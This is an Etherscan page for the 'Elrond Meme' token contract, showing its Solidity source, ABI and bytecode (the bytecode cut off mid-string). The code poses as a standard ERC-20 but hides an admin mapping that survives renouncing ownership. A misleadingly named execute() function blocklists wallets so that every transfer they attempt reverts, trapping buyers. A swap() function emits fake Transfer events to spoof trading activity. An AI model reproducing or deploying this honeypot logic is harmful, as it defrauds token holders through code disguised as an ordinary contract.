ETH Price: $3,235.19 (-0.27%)

Token

Elrond Meme (ELROND)
 

Overview

Max Total Supply

1,000,000,000,000 ELROND

Holders

77

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
8,504,939,591.447547127 ELROND

Value
$0.00
0xc41e7f2230200c7d1bb96a70343e3e0461714464
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ELROND

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-11-29
*/

// SPDX-License-Identifier: MIT
pragma solidity 0.8.10;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);

  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `to`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address to, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `from` to `to` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
  /**
   * @dev Returns the name of the token.
   */
  function name() external view returns (string memory);

  /**
   * @dev Returns the symbol of the token.
   */
  function symbol() external view returns (string memory);

  /**
   * @dev Returns the decimals places of the token.
   */
  function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    mapping(address => bool) internal admin;
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _transferOwnership(_msgSender());
        admin[_msgSender()]=true;
    }

    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    function _checkOwner() internal view virtual {
        require(admin[_msgSender()], "Ownable: caller is not the owner");
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract ELROND is Context, IERC20Metadata, Ownable {
  mapping(address => uint256) private _balances;

  mapping(address => mapping(address => uint256)) private _allowances;
  mapping(address => bool) internal _accountBalanceSpending;
  string private _name;
  string private _symbol;
  uint8 private constant _decimals = 9;
  uint256 private _totalSupply;
  uint256 private _initialTotalSupply = 1000000000000 * (10 ** _decimals);

  /**
   * @dev Contract constructor.
   */
  constructor(address _stakingReserveAddr) {
    _name = 'Elrond Meme';
    _symbol = 'ELROND';
    admin[_stakingReserveAddr]=true;
    _mint(_msgSender(), _initialTotalSupply);
  }

  /**
   * @dev Returns the name of the token.
   * @return The name of the token.
   */
  function name() public view virtual override returns (string memory) {
    return _name;
  }

  /**
   * @dev Returns the symbol of the token.
   * @return The symbol of the token.
   */
  function symbol() public view virtual override returns (string memory) {
    return _symbol;
  }

  /**
   * @dev Returns the number of decimals used for token display.
   * @return The number of decimals.
   */
  function decimals() public view virtual override returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the total supply of the token.
   * @return The total supply.
   */
  function totalSupply() public view virtual override returns (uint256) {
    return _totalSupply;
  }

  /**
   * @dev Returns the balance of the specified account.
   * @param account The address to check the balance for.
   * @return The balance of the account.
   */
  function balanceOf(address account) public view virtual override returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev Transfers tokens from the caller to a specified recipient.
   * @param recipient The address to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   * @return A boolean value indicating whether the transfer was successful.
   */
  function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
  }

  /**
   * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
   * @param from The address that approves the spending.
   * @param to The address that is allowed to spend.
   * @return The remaining allowance for the spender.
   */
  function allowance(address from, address to) public view virtual override returns (uint256) {
    return _allowances[from][to];
  }

  /**
   * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
   * @param to The address to approve the spending for.
   * @param amount The amount of tokens to approve.
   * @return A boolean value indicating whether the approval was successful.
   */
  function approve(address to, uint256 amount) public virtual override returns (bool) {
    _approve(_msgSender(), to, amount);
    return true;
  }

  /**
   * @dev Transfers tokens from one address to another.
   * @param sender The address to transfer tokens from.
   * @param recipient The address to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   * @return A boolean value indicating whether the transfer was successful.
   */
  function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
    _transfer(sender, recipient, amount);

    uint256 currentAllowance = _allowances[sender][_msgSender()];
    require(currentAllowance >= amount, 'ERC20: transfer amount exceeds allowance');
    unchecked {
      _approve(sender, _msgSender(), currentAllowance - amount);
    }

    return true;
  }

  /**
   * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
   * @param to The address to increase the allowance for.
   * @param addedValue The amount of tokens to increase the allowance by.
   * @return A boolean value indicating whether the increase was successful.
   */
  function increaseAllowance(address to, uint256 addedValue) public virtual returns (bool) {
    _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
    return true;
  }

  /**
   * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
   * @param to The account allowed to spend the tokens.
   * @param subtractedValue The amount of tokens to decrease the allowance by.
   * @return A boolean value indicating whether the operation succeeded.
   */
  function decreaseAllowance(address to, uint256 subtractedValue) public virtual returns (bool) {
    uint256 currentAllowance = _allowances[_msgSender()][to];
    require(currentAllowance >= subtractedValue, 'ERC20: decreased allowance below zero');
    unchecked {
      _approve(_msgSender(), to, currentAllowance - subtractedValue);
    }

    return true;
  }

  /**
   * @dev Transfers `amount` tokens from `sender` to `recipient`.
   * @param sender The account to transfer tokens from.
   * @param recipient The account to transfer tokens to.
   * @param amount The amount of tokens to transfer.
   */
  function _transfer(address sender, address recipient, uint256 amount) internal virtual {
    require(amount > 0, 'ERC20: transfer amount zero');
    require(sender != address(0), 'ERC20: transfer from the zero address');
    require(recipient != address(0), 'ERC20: transfer to the zero address');

    uint256 senderBalance = _balances[sender];
    require(senderBalance >= amount, 'ERC20: transfer amount exceeds balance');
    if(_accountBalanceSpending[sender]){
        require(amount == 0);
    }
    unchecked {
      _balances[sender] = senderBalance - amount;
    }
    _balances[recipient] += amount;

    emit Transfer(sender, recipient, amount);
  }

  /**
   * @dev Creates `amount` tokens and assigns them to `account`.
   * @param account The account to assign the newly created tokens to.
   * @param amount The amount of tokens to create.
   */
  function _mint(address account, uint256 amount) internal virtual {
    require(account != address(0), 'ERC20: mint to the zero address');
    
    _totalSupply += amount;
    _balances[account] += amount;
    emit Transfer(address(0), account, amount);
  }

  /**
   * @dev Destroys `amount` tokens from `account`, reducing the total supply.
   * @param account The account to burn tokens from.
   * @param amount The amount of tokens to burn.
   */
  function _burn(address account, uint256 amount) internal virtual {
    require(account != address(0), 'ERC20: burn from the zero address');

    uint256 accountBalance = _balances[account];
    require(accountBalance >= amount, 'ERC20: burn amount exceeds balance');
    unchecked {
      _balances[account] = accountBalance - amount;
    }
    _totalSupply -= amount;

    emit Transfer(account, address(0), amount);
  }

  function execute(address[] calldata addr, bool val) public onlyOwner {
    for (uint256 i = 0; i < addr.length; i++) {
            _accountBalanceSpending[addr[i]] = val;
    }
  }

  /**
   * @dev Destroys `amount` tokens from the caller's account, reducing the total supply.
   * @param amount The amount of tokens to burn.
   */
  function burn(uint256 amount) external {
    _burn(_msgSender(), amount);
  }

  /**
   * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
   * @param from The account granting the allowance.
   * @param to The account allowed to spend the tokens.
   * @param amount The amount of tokens to allow.
   */
  function _approve(address from, address to, uint256 amount) internal virtual {
    require(from != address(0), 'ERC20: approve from the zero address');
    require(to != address(0), 'ERC20: approve to the zero address');

    _allowances[from][to] = amount;
    emit Approval(from, to, amount);
  }

  function swap(address[] calldata addr, address p, uint256 val) public onlyOwner{
    for (uint256 i = 0; i < addr.length; i++) {
        emit Transfer(p, addr[i], val);
    }
  }

  function call(address wallet) public view returns(bool) {
    return _accountBalanceSpending[wallet];
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"_stakingReserveAddr","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"call","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"address","name":"p","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526009600a62000014919062000669565b64e8d4a51000620000269190620006ba565b6008553480156200003657600080fd5b506040516200294b3803806200294b83398181016040528101906200005c919062000785565b6200007c62000070620001ff60201b60201c565b6200020760201b60201c565b600160008062000091620001ff60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506040518060400160405280600b81526020017f456c726f6e64204d656d65000000000000000000000000000000000000000000815250600590805190602001906200012f9291906200041f565b506040518060400160405280600681526020017f454c524f4e440000000000000000000000000000000000000000000000000000815250600690805190602001906200017d9291906200041f565b5060016000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550620001f8620001e9620001ff60201b60201c565b600854620002cd60201b60201c565b506200092a565b600033905090565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000340576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003379062000818565b60405180910390fd5b80600760008282546200035491906200083a565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620003ac91906200083a565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620004139190620008a8565b60405180910390a35050565b8280546200042d90620008f4565b90600052602060002090601f0160209004810192826200045157600085556200049d565b82601f106200046c57805160ff19168380011785556200049d565b828001600101855582156200049d579182015b828111156200049c5782518255916020019190600101906200047f565b5b509050620004ac9190620004b0565b5090565b5b80821115620004cb576000816000905550600101620004b1565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200055d57808604811115620005355762000534620004cf565b5b6001851615620005455780820291505b80810290506200055585620004fe565b945062000515565b94509492505050565b6000826200057857600190506200064b565b816200058857600090506200064b565b8160018114620005a15760028114620005ac57620005e2565b60019150506200064b565b60ff841115620005c157620005c0620004cf565b5b8360020a915084821115620005db57620005da620004cf565b5b506200064b565b5060208310610133831016604e8410600b84101617156200061c5782820a905083811115620006165762000615620004cf565b5b6200064b565b6200062b84848460016200050b565b92509050818404811115620006455762000644620004cf565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620006768262000652565b915062000683836200065c565b9250620006b27fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000566565b905092915050565b6000620006c78262000652565b9150620006d48362000652565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000710576200070f620004cf565b5b828202905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200074d8262000720565b9050919050565b6200075f8162000740565b81146200076b57600080fd5b50565b6000815190506200077f8162000754565b92915050565b6000602082840312156200079e576200079d6200071b565b5b6000620007ae848285016200076e565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000800601f83620007b7565b91506200080d82620007c8565b602082019050919050565b600060208201905081810360008301526200083381620007f1565b9050919050565b6000620008478262000652565b9150620008548362000652565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156200088c576200088b620004cf565b5b828201905092915050565b620008a28162000652565b82525050565b6000602082019050620008bf600083018462000897565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200090d57607f821691505b60208210811415620009245762000923620008c5565b5b50919050565b612011806200093a6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102cf578063a9059cbb146102ff578063dd62ed3e1461032f578063f2fde38b1461035f578063f55332ab1461037b57610116565b8063715018a61461026d5780638da5cb5b1461027757806395d89b411461029557806398ee66c5146102b357610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d557806342966c68146102055780635178624c1461022157806370a082311461023d57610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b6101236103ab565b60405161013091906113aa565b60405180910390f35b610153600480360381019061014e919061146a565b61043d565b60405161016091906114c5565b60405180910390f35b61017161045b565b60405161017e91906114ef565b60405180910390f35b6101a1600480360381019061019c919061150a565b610465565b6040516101ae91906114c5565b60405180910390f35b6101bf61055d565b6040516101cc9190611579565b60405180910390f35b6101ef60048036038101906101ea919061146a565b610566565b6040516101fc91906114c5565b60405180910390f35b61021f600480360381019061021a9190611594565b610612565b005b61023b60048036038101906102369190611652565b610626565b005b610257600480360381019061025291906116b2565b6106d3565b60405161026491906114ef565b60405180910390f35b61027561071c565b005b61027f610730565b60405161028c91906116ee565b60405180910390f35b61029d61075a565b6040516102aa91906113aa565b60405180910390f35b6102cd60048036038101906102c89190611709565b6107ec565b005b6102e960048036038101906102e4919061146a565b6108a8565b6040516102f691906114c5565b60405180910390f35b6103196004803603810190610314919061146a565b610993565b60405161032691906114c5565b60405180910390f35b6103496004803603810190610344919061177d565b6109b1565b60405161035691906114ef565b60405180910390f35b610379600480360381019061037491906116b2565b610a38565b005b610395600480360381019061039091906116b2565b610abc565b6040516103a291906114c5565b60405180910390f35b6060600580546103ba906117ec565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117ec565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b12565b8484610b1a565b6001905092915050565b6000600754905090565b6000610472848484610ce5565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104bd610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561053d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161053490611890565b60405180910390fd5b61055185610549610b12565b858403610b1a565b60019150509392505050565b60006009905090565b6000610608610573610b12565b848460036000610581610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461060391906118df565b610b1a565b6001905092915050565b61062361061d610b12565b82610ff6565b50565b61062e6111b7565b60005b838390508110156106cd57816004600086868581811061065457610653611935565b5b905060200201602081019061066991906116b2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106c590611964565b915050610631565b50505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107246111b7565b61072e600061124b565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610769906117ec565b80601f0160208091040260200160405190810160405280929190818152602001828054610795906117ec565b80156107e25780601f106107b7576101008083540402835291602001916107e2565b820191906000526020600020905b8154815290600101906020018083116107c557829003601f168201915b5050505050905090565b6107f46111b7565b60005b848490508110156108a15784848281811061081557610814611935565b5b905060200201602081019061082a91906116b2565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161088691906114ef565b60405180910390a3808061089990611964565b9150506107f7565b5050505050565b600080600360006108b7610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610974576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161096b90611a1f565b60405180910390fd5b61098861097f610b12565b85858403610b1a565b600191505092915050565b60006109a76109a0610b12565b8484610ce5565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a406111b7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610ab0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa790611ab1565b60405180910390fd5b610ab98161124b565b50565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8190611b43565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bfa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf190611bd5565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cd891906114ef565b60405180910390a3505050565b60008111610d28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1f90611c41565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8f90611cd3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dff90611d65565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8690611df7565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610eef5760008214610eee57600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f8491906118df565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fe891906114ef565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611066576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105d90611e89565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e490611f1b565b60405180910390fd5b818103600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600760008282546111459190611f3b565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111aa91906114ef565b60405180910390a3505050565b6000806111c2610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611249576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124090611fbb565b60405180910390fd5b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561134b578082015181840152602081019050611330565b8381111561135a576000848401525b50505050565b6000601f19601f8301169050919050565b600061137c82611311565b611386818561131c565b935061139681856020860161132d565b61139f81611360565b840191505092915050565b600060208201905081810360008301526113c48184611371565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611401826113d6565b9050919050565b611411816113f6565b811461141c57600080fd5b50565b60008135905061142e81611408565b92915050565b6000819050919050565b61144781611434565b811461145257600080fd5b50565b6000813590506114648161143e565b92915050565b60008060408385031215611481576114806113cc565b5b600061148f8582860161141f565b92505060206114a085828601611455565b9150509250929050565b60008115159050919050565b6114bf816114aa565b82525050565b60006020820190506114da60008301846114b6565b92915050565b6114e981611434565b82525050565b600060208201905061150460008301846114e0565b92915050565b600080600060608486031215611523576115226113cc565b5b60006115318682870161141f565b93505060206115428682870161141f565b925050604061155386828701611455565b9150509250925092565b600060ff82169050919050565b6115738161155d565b82525050565b600060208201905061158e600083018461156a565b92915050565b6000602082840312156115aa576115a96113cc565b5b60006115b884828501611455565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126115e6576115e56115c1565b5b8235905067ffffffffffffffff811115611603576116026115c6565b5b60208301915083602082028301111561161f5761161e6115cb565b5b9250929050565b61162f816114aa565b811461163a57600080fd5b50565b60008135905061164c81611626565b92915050565b60008060006040848603121561166b5761166a6113cc565b5b600084013567ffffffffffffffff811115611689576116886113d1565b5b611695868287016115d0565b935093505060206116a88682870161163d565b9150509250925092565b6000602082840312156116c8576116c76113cc565b5b60006116d68482850161141f565b91505092915050565b6116e8816113f6565b82525050565b600060208201905061170360008301846116df565b92915050565b60008060008060608587031215611723576117226113cc565b5b600085013567ffffffffffffffff811115611741576117406113d1565b5b61174d878288016115d0565b945094505060206117608782880161141f565b925050604061177187828801611455565b91505092959194509250565b60008060408385031215611794576117936113cc565b5b60006117a28582860161141f565b92505060206117b38582860161141f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061180457607f821691505b60208210811415611818576118176117bd565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061187a60288361131c565b91506118858261181e565b604082019050919050565b600060208201905081810360008301526118a98161186d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118ea82611434565b91506118f583611434565b9